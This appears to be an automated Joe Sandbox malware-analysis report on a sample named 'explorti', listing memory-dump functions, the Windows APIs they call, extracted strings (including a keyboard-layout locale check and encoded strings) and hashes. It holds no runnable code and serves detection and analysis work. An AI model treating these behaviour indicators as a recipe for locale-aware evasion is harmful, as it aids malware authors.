Opcode ID: 4e8801b04d98641c005b5e169ba096568068bea77df5f70e767afcd2694be58a
Instruction ID: cfa7446927961892ed433b5e590fdd5eb085dd78e2a793c458c7e913afb2a330
Opcode Fuzzy Hash: 4e8801b04d98641c005b5e169ba096568068bea77df5f70e767afcd2694be58a
Instruction Fuzzy Hash: EC520471A00248DBEF18EF78CD4ABDDBB76AF45300F504198E445A7282DB759AC5CBA2

Function 00A05DF0 Relevance: 12.6, APIs: 2, Strings: 5, Instructions: 364
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

00000423, xrefs: 00A0600A
0000043f, xrefs: 00A0603B
Keyboard Layout\Preload, xrefs: 00A05F64
00000419, xrefs: 00A05FA8
00000422, xrefs: 00A05FD9

Memory Dump Source

Source File: 00000007.00000002.2896017523.0000000000A01000.00000040.00000001.01000000.00000007.sdmp, Offset: 00A00000, based on PE: true

Associated: 00000007.00000002.2895993515.0000000000A00000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2896017523.0000000000A62000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2896118697.0000000000A69000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2896145299.0000000000A6B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2896145299.0000000000BF4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2896145299.0000000000CCA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2896145299.0000000000CFA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2896145299.0000000000D02000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2896145299.0000000000D10000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2896495970.0000000000D11000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2896648350.0000000000EAA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2896664715.0000000000EAC000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_a00000_explorti.jbxd

Yara matches

Similarity

API ID:
String ID: 00000419$00000422$00000423$0000043f$Keyboard Layout\Preload
API String ID: 0-3963862150
Opcode ID: f6a3a878bed19cc7dd0ca39f3a88a6b3249682ebeb087570e60661aa35625332
Instruction ID: 718b632e8a7cd49fe6ad787c0e0980e32f95b5efadc944ef084884b3ee757ef0
Opcode Fuzzy Hash: f6a3a878bed19cc7dd0ca39f3a88a6b3249682ebeb087570e60661aa35625332
Instruction Fuzzy Hash: C0E17D7190021CABEB28DFA4CD89BDEB7B9AB04304F5042D9E509A7291DB74ABC5CF51

Function 00A07D00 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 392
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetNativeSystemInfo.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00A07EA3

Strings

HlurOK==, xrefs: 00A08062
HlusMa==, xrefs: 00A0810A
HlurNa==, xrefs: 00A081B2

Memory Dump Source

Source File: 00000007.00000002.2896017523.0000000000A01000.00000040.00000001.01000000.00000007.sdmp, Offset: 00A00000, based on PE: true

Associated: 00000007.00000002.2895993515.0000000000A00000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2896017523.0000000000A62000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2896118697.0000000000A69000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2896145299.0000000000A6B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2896145299.0000000000BF4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2896145299.0000000000CCA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2896145299.0000000000CFA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2896145299.0000000000D02000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2896145299.0000000000D10000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2896495970.0000000000D11000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2896648350.0000000000EAA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2896664715.0000000000EAC000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_a00000_explorti.jbxd

Yara matches

Similarity

API ID: InfoNativeSystem
String ID: HlurNa==$HlurOK==$HlusMa==
API String ID: 1721193555-2203186029
Opcode ID: 4069a547dda4f626a5716fceee91c536ee37d1aeaa6fb4da0c67083a80d247ff
Instruction ID: 6e1c815ab1685a330408bce4dfcfe353d98ed244bba66c21c41541ba0fcb0c02
Opcode Fuzzy Hash: 4069a547dda4f626a5716fceee91c536ee37d1aeaa6fb4da0c67083a80d247ff
Instruction Fuzzy Hash: A5D12771E00608ABDF14FB68ED4B39E7B71AB46320F544288E4556B3C2DB795E818BD2

Function 00A36E01 Relevance: 4.6, APIs: 3, Instructions: 145
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetFileType.KERNELBASE(?,?,00000000,00000000), ref: 00A36E23
GetFileInformationByHandle.KERNELBASE(?,?), ref: 00A36E7D
__dosmaperr.LIBCMT ref: 00A36F12

Part of subcall function 00A37177: __dosmaperr.LIBCMT ref: 00A371AC

Memory Dump Source

Source File: 00000007.00000002.2896017523.0000000000A01000.00000040.00000001.01000000.00000007.sdmp, Offset: 00A00000, based on PE: true

Associated: 00000007.00000002.2895993515.0000000000A00000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2896017523.0000000000A62000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2896118697.0000000000A69000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2896145299.0000000000A6B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2896145299.0000000000BF4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2896145299.0000000000CCA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2896145299.0000000000CFA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2896145299.0000000000D02000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2896145299.0000000000D10000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2896495970.0000000000D11000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2896648350.0000000000EAA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2896664715.0000000000EAC000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_a00000_explorti.jbxd

Yara matches

Similarity

API ID: File__dosmaperr$HandleInformationType
String ID:
API String ID: 2531987475-0
Opcode ID: 8eb6d7891f66ca89906a3bfd438bb61bf42ed82e2528b5c5217b653c1c29256d
Instruction ID: 9a14a5121937a2ee9acb7806c2336ebceec13f69b732a708ffb28deccdd8d79a
Opcode Fuzzy Hash: 8eb6d7891f66ca89906a3bfd438bb61bf42ed82e2528b5c5217b653c1c29256d
Instruction Fuzzy Hash: B5414BB5900304BADB28EFB5E9459AFBBF9EF89300B10852DF556D3610EA31A904CB20

Function 00A3D4F4 Relevance: 1.7, APIs: 1, Instructions: 198
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000007.00000002.2896017523.0000000000A01000.00000040.00000001.01000000.00000007.sdmp, Offset: 00A00000, based on PE: true

Associated: 00000007.00000002.2895993515.0000000000A00000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2896017523.0000000000A62000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2896118697.0000000000A69000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2896145299.0000000000A6B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2896145299.0000000000BF4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2896145299.0000000000CCA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2896145299.0000000000CFA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2896145299.0000000000D02000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2896145299.0000000000D10000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2896495970.0000000000D11000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2896648350.0000000000EAA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2896664715.0000000000EAC000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_a00000_explorti.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 37cff99000c0e12792c732890090739051e898e28d04af405cda4fd9283cc5ad
Instruction ID: 883ebb55d6747a5d3ac6329fb592134c20b05e702e7d17816e84e6016d3f2bf7
Opcode Fuzzy Hash: 37cff99000c0e12792c732890090739051e898e28d04af405cda4fd9283cc5ad
Instruction Fuzzy Hash: FD612372D10224DFDF21EFA8F9866EDBBB0BB55315F24412AF459AB290D7308C01CB61

Function 00A082B0 Relevance: 1.7, APIs: 1, Instructions: 159
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetNativeSystemInfo.KERNELBASE(?), ref: 00A08454

Memory Dump Source

Source File: 00000007.00000002.2896017523.0000000000A01000.00000040.00000001.01000000.00000007.sdmp, Offset: 00A00000, based on PE: true

Associated: 00000007.00000002.2895993515.0000000000A00000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2896017523.0000000000A62000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2896118697.0000000000A69000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2896145299.0000000000A6B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2896145299.0000000000BF4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2896145299.0000000000CCA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2896145299.0000000000CFA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2896145299.0000000000D02000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2896145299.0000000000D10000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2896495970.0000000000D11000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2896648350.0000000000EAA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2896664715.0000000000EAC000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_a00000_explorti.jbxd

Yara matches

Similarity

API ID: InfoNativeSystem
String ID:
API String ID: 1721193555-0
Opcode ID: 537a56898267ec807bdd3525646454f71db6b125fab272e12799d874b8751850
Instruction ID: 233a246249a05dee293087bfe59e47dfddaab7f1381e4df7e40e56619daed691
Opcode Fuzzy Hash: 537a56898267ec807bdd3525646454f71db6b125fab272e12799d874b8751850
Instruction Fuzzy Hash: D8512C71D0020C9BDB14EB78DD897DDB775EB45310F5042A8E844A72D1EF399EC48B95

Function 00A08A60 Relevance: 1.6, APIs: 1, Instructions: 140
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTempPathA.KERNELBASE(00000104,?,D9F67877,?,00000000), ref: 00A08AA7

Memory Dump Source

Source File: 00000007.00000002.2896017523.0000000000A01000.00000040.00000001.01000000.00000007.sdmp, Offset: 00A00000, based on PE: true

Associated: 00000007.00000002.2895993515.0000000000A00000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2896017523.0000000000A62000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2896118697.0000000000A69000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2896145299.0000000000A6B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2896145299.0000000000BF4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2896145299.0000000000CCA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2896145299.0000000000CFA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2896145299.0000000000D02000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2896145299.0000000000D10000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2896495970.0000000000D11000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2896648350.0000000000EAA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2896664715.0000000000EAC000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_a00000_explorti.jbxd

Yara matches

Similarity

API ID: PathTemp
String ID:
API String ID: 2920410445-0
Opcode ID: e80c6f534e2865e42677b3566532ea71d2e803e1ef11899c1bb2e671e1fb9e5e
Instruction ID: d3cf51c81126dcfab4b6c5875d4792ccd292cbc5d12ff736b15e3fb995177d73
Opcode Fuzzy Hash: e80c6f534e2865e42677b3566532ea71d2e803e1ef11899c1bb2e671e1fb9e5e
Instruction Fuzzy Hash: AC51EE71A011589BEB28DB28CD85BDEB775EB46310F0082E9E449A72C2DB395B84CF94

Function 00A36C99 Relevance: 1.6, APIs: 1, Instructions: 89
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000007.00000002.2896017523.0000000000A01000.00000040.00000001.01000000.00000007.sdmp, Offset: 00A00000, based on PE: true

Associated: 00000007.00000002.2895993515.0000000000A00000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2896017523.0000000000A62000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2896118697.0000000000A69000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2896145299.0000000000A6B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2896145299.0000000000BF4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2896145299.0000000000CCA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2896145299.0000000000CFA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2896145299.0000000000D02000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2896145299.0000000000D10000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2896495970.0000000000D11000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2896648350.0000000000EAA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2896664715.0000000000EAC000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_a00000_explorti.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 439ec7c0f095e452c0e4ebcf5ed789cee69d299329cdf7bb3453e2888811212b
Instruction ID: e8a9e3bfd20c425ac06099fca2ee9af3e63f6a3d625f08d10650346ff4887a4d
Opcode Fuzzy Hash: 439ec7c0f095e452c0e4ebcf5ed789cee69d299329cdf7bb3453e2888811212b
Instruction Fuzzy Hash: 81212972A016087AEB217F64AD42B9F77299F42378F208310F9343B1D1DBB0AE0596A1

Function 00A36F71 Relevance: 1.6, APIs: 1, Instructions: 56
timeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SystemTimeToTzSpecificLocalTime.KERNELBASE(00000000,?,?), ref: 00A36FB3

Memory Dump Source

Source File: 00000007.00000002.2896017523.0000000000A01000.00000040.00000001.01000000.00000007.sdmp, Offset: 00A00000, based on PE: true

Associated: 00000007.00000002.2895993515.0000000000A00000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2896017523.0000000000A62000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2896118697.0000000000A69000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2896145299.0000000000A6B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2896145299.0000000000BF4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2896145299.0000000000CCA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2896145299.0000000000CFA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2896145299.0000000000D02000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2896145299.0000000000D10000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2896495970.0000000000D11000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2896648350.0000000000EAA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2896664715.0000000000EAC000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_a00000_explorti.jbxd

Yara matches

Similarity

API ID: Time$LocalSpecificSystem
String ID:
API String ID: 2574697306-0
Opcode ID: df4257ced5a4d2882920bfbd03104ad5db375b4179e5c344d17081ac4406e240
Instruction ID: 9126b79e29e7bda91d274c6dd1b68a150697188d27ae453eaa8dd9362f033acf
Opcode Fuzzy Hash: df4257ced5a4d2882920bfbd03104ad5db375b4179e5c344d17081ac4406e240
Instruction Fuzzy Hash: 72119AB290020CBBDB14DBD5D945EDFB7BCAF48310F509266F526E6180EB34EB498B61

Function 00A3D6EF Relevance: 1.5, APIs: 1, Instructions: 40
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00000003,00A3A5ED,?,00A374AE,?,00000000,?), ref: 00A3D730

Memory Dump Source

Source File: 00000007.00000002.2896017523.0000000000A01000.00000040.00000001.01000000.00000007.sdmp, Offset: 00A00000, based on PE: true

Associated: 00000007.00000002.2895993515.0000000000A00000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2896017523.0000000000A62000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2896118697.0000000000A69000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2896145299.0000000000A6B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2896145299.0000000000BF4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2896145299.0000000000CCA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2896145299.0000000000CFA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2896145299.0000000000D02000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2896145299.0000000000D10000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2896495970.0000000000D11000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2896648350.0000000000EAA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2896664715.0000000000EAC000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_a00000_explorti.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 928bd1599a589ea84fb4867e848dae4506bf9f60d99c1aae64843adc3ef972b3
Instruction ID: 3fdf1b4d03f28fb69f62be7181041937cf2e399bd67a1994790a21776561a993
Opcode Fuzzy Hash: 928bd1599a589ea84fb4867e848dae4506bf9f60d99c1aae64843adc3ef972b3
Instruction Fuzzy Hash: 0FF0E931A49124E69B217B22BD02A5B7BA99F817B0F195111FC04EA181CA60DC0043F1

Function 00A3AF0B Relevance: 1.5, APIs: 1, Instructions: 33memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,00A16B27,?,?,00A1D32C,00A16B27,?,00A178FB,8B18EC84,05370941), ref: 00A3AF3E

Memory Dump Source

Source File: 00000007.00000002.2896017523.0000000000A01000.00000040.00000001.01000000.00000007.sdmp, Offset: 00A00000, based on PE: true

Associated: 00000007.00000002.2895993515.0000000000A00000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2896017523.0000000000A62000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2896118697.0000000000A69000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2896145299.0000000000A6B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2896145299.0000000000BF4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2896145299.0000000000CCA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2896145299.0000000000CFA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2896145299.0000000000D02000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2896145299.0000000000D10000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2896495970.0000000000D11000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2896648350.0000000000EAA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2896664715.0000000000EAC000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_a00000_explorti.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: fd0eb84ac04b94404461c130d6bba26dbda9890bd185b607c19a576cd0f8afc7
Instruction ID: ef6aa3226a341740144f14f73ac32507191b6fcbfca5cf4d6be35d3815837362
Opcode Fuzzy Hash: fd0eb84ac04b94404461c130d6bba26dbda9890bd185b607c19a576cd0f8afc7
Instruction Fuzzy Hash: 88E022B260E6326AEB2033656D02B6B768C8FB23B1F054050FC85920C0DF64CC0082E3

Function 053E0C0D Relevance: .3, Instructions: 344COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2898233490.00000000053E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 053E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_53e0000_explorti.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6b6d725fa73d15b9f231e70ab5d67852caa3801dd0eee5b0babd99229c1dff77
Instruction ID: a22bb2ddb6d65598db91bce9ddb720499e092f80af66a7ab7a6ee7407522be86
Opcode Fuzzy Hash: 6b6d725fa73d15b9f231e70ab5d67852caa3801dd0eee5b0babd99229c1dff77
Instruction Fuzzy Hash: 402160EB14C135BD704AC1422F68AFB5BEFE1D27303318427F807DA986D2D94A8E1171

Function 053E0C19 Relevance: .2, Instructions: 166COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2898233490.00000000053E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 053E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_53e0000_explorti.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 011e2c151a924d12d003f470c7c55a7e678df075cebd9cbe54eb256c7c68c296
Instruction ID: 568b82ae30e24efb46c90ef2f2f9d69037169e43478f05414d442ebc30a5e9aa
Opcode Fuzzy Hash: 011e2c151a924d12d003f470c7c55a7e678df075cebd9cbe54eb256c7c68c296
Instruction Fuzzy Hash: 693174EB14C135BD700AC5416F68AFB6BEEE5D27303308827F843DA986D2D55A4D5172

Function 053E0C58 Relevance: .1, Instructions: 142COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2898233490.00000000053E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 053E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_53e0000_explorti.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9e34234447d7607255f442f39c6f458dcc6902a0ccc839d7b7ac3efc484ddc50
Instruction ID: d25633da3cc4730fe432715f239bc2a4b5eebbfb097d9bc211af2f996cfcf013
Opcode Fuzzy Hash: 9e34234447d7607255f442f39c6f458dcc6902a0ccc839d7b7ac3efc484ddc50
Instruction Fuzzy Hash: CF2191EB14C135BDB409C1466F68AFB1BDFE1D27303308427F803DA9C6E2D95A995171

Function 053E0C3F Relevance: .1, Instructions: 134COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2898233490.00000000053E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 053E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_53e0000_explorti.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5b47878e7b042985998a86253ab52c4e2bfcaf188c02207dc79778ed5b7ba359
Instruction ID: 6bebd3b79f48d2ebbd70405e03f6437089ab182c5878b002f97c376cdf4cf493
Opcode Fuzzy Hash: 5b47878e7b042985998a86253ab52c4e2bfcaf188c02207dc79778ed5b7ba359
Instruction Fuzzy Hash: DC213CEB14C135BD7006C1463F68AFB6BDEE1D2B303318827F847D9986E2D95A8A5171

Function 053E0C81 Relevance: .1, Instructions: 114COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2898233490.00000000053E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 053E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_53e0000_explorti.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fdfd6630e55014d12a52e49460f7de1e4557a6c7f928e018c70bc4dc4adbabc0
Instruction ID: e95a159cd8305890a983fa19e929b5db2619b394b1688613a65314a24eeb4fbc
Opcode Fuzzy Hash: fdfd6630e55014d12a52e49460f7de1e4557a6c7f928e018c70bc4dc4adbabc0
Instruction Fuzzy Hash: 60117FEF14C134BD7406C1466F68AFB6BDFE1D27303308426F807DA986E2D95A8D5172

Function 053E0C95 Relevance: .1, Instructions: 112COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2898233490.00000000053E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 053E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_53e0000_explorti.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 87661256ae037172d843514456a8d79a675282abb354e9cdba453f36faaed01d
Instruction ID: b2a16d0580fb14c137e9d58ffe9d2fbf061771ab686e5079e0865871a28ee4ef
Opcode Fuzzy Hash: 87661256ae037172d843514456a8d79a675282abb354e9cdba453f36faaed01d
Instruction Fuzzy Hash: 5511E7EF14C135BD700AC5456F689FB6BDFE1D27303308426F803DA9C6D2D91A495131

Function 053E0CAC Relevance: .1, Instructions: 109COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2898233490.00000000053E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 053E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_53e0000_explorti.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2f71ec19af1e99f59d5c47689e411798331a1a4dc7499ff51cbeb1f78d8bf123
Instruction ID: 94c176e6f7a1841990d84d338db2f053d2fe23887830cb543e69ddab31f91fd0
Opcode Fuzzy Hash: 2f71ec19af1e99f59d5c47689e411798331a1a4dc7499ff51cbeb1f78d8bf123
Instruction Fuzzy Hash: 9911E2EF14C135BD7406C1426F68AFB6BDEE1C2B303308826F847C69C6E2D50A8E5172

Function 053E0CC4 Relevance: .1, Instructions: 102COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2898233490.00000000053E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 053E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_53e0000_explorti.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 492377d37135785c54f6e9a5613ef3627dedfc7b05fbe48f5a2c8ccba402df42
Instruction ID: 101e5c4aaa4bbeccda2c79b5ca8e411fecae17654b2affac4d3adbc4f58c52b8
Opcode Fuzzy Hash: 492377d37135785c54f6e9a5613ef3627dedfc7b05fbe48f5a2c8ccba402df42
Instruction Fuzzy Hash: 841190EB14C2387E7505D1852F68AFB5B9EE1D27303308426F803DA985D2D91A895171

Function 053E0CDE Relevance: .1, Instructions: 101COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2898233490.00000000053E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 053E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_53e0000_explorti.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e37ca169ab7154bcd068ad0c87de315639a266a15561a23215219d2456cee341
Instruction ID: 28de56c7381f56bed42b1ea8870a970c33528b982d6c84d393ecebe40f390173
